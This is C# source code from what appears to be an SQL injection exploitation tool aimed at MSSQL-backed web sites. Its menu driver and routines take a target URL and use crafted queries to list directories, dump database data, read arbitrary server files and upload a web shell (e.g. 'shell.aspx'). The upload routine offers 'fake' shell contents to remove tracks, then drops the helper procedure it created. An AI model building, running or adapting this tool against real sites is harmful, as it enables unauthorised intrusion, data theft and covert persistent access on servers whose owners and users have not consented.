static void Main(string[] args)
{
QueriesDB.initialize();
UserInteraction.showBanner();
string basicURL = null;
while (basicURL != "x")
{
basicURL = null;
Log.logNotification("Press 'x' for exit..");
UserInteraction.promptForUserInput("Enter url");
basicURL = Console.ReadLine();
Exploitation.initialize(basicURL);
if (basicURL != "x" && !String.IsNullOrEmpty(basicURL))
{
int Choice = -1;
while (Choice != 0)
{
Choice = UserInteraction.showMenuForIntChoice("Press '0' for Exit..\nPress '1' for directory navigation..\nPress '2' for dumping data.." +
"\nPress '3' for files reading..\nPress '4' for shell uploading..");
if (Choice == 1)
{
DirListing.initialize(basicURL);
}
else if (Choice == 2)
{
DumpData.initialize(basicURL);
}
else if (Choice == 3)
{
ReadFile.Read(basicURL);
}
else if (Choice == 4)
{
ShellSpawning.Spawn(basicURL);
}
}
}
}
Log.logOutput("Program is going to exit.. Press any key..");
Console.ReadKey();
}
public static void Read(string url)
{
string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);
string UserChoice = "z";
while (UserChoice != "x")
{
UserChoice = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext ..");
if (UserChoice != "x")
{
string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", UserChoice);
var response = HTTPMethods.getResponse(FinalFileReadURL);
if (response != null)
{
response = ResponseFilter.getPureResponseWithLastIndex(response);
if (response != null)
{
Log.logOutput("--- [File Contents Start] ---");
Log.logOutput(response);
Log.logOutput("--- [File Cotents End] ---");
UserChoice = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore..");
if (UserChoice == "s")
{
SaveFile(response);
}
UserChoice = "z";
}
else
{
Log.logError("Either File is empty or you 've no right to read that File..");
}
}
}
}
}
public static void Spawn(string url)
{
Log.logNotification("Confirming Web Response..");
var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
{
Log.logNotification("Web Response is OK..");
if (createProcFcUk(url))
{
string RootPath = "z";
while (RootPath != "x")
{
RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
if (RootPath != "x")
{
string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");
string UrlForUploading = null;
string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");
if (x == "f")
{
UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE);
}
else
{
UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);
}
UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath);
UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName);
UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement);
Log.logNotification("Uploading shell to " + RootPath + fileName);
if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement))
{
Log.logNotification("Confirming File Upload..");
if (confirmFileUpload(url, RootPath + fileName))
{
Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName);
}
else
{
Log.logError("Fail to upload file..");
}
}
}
}
}
dropObject(url, QueriesDB.DropFcUkProcQuery);
}
else
{
Log.logError("No response from the server..");
}
}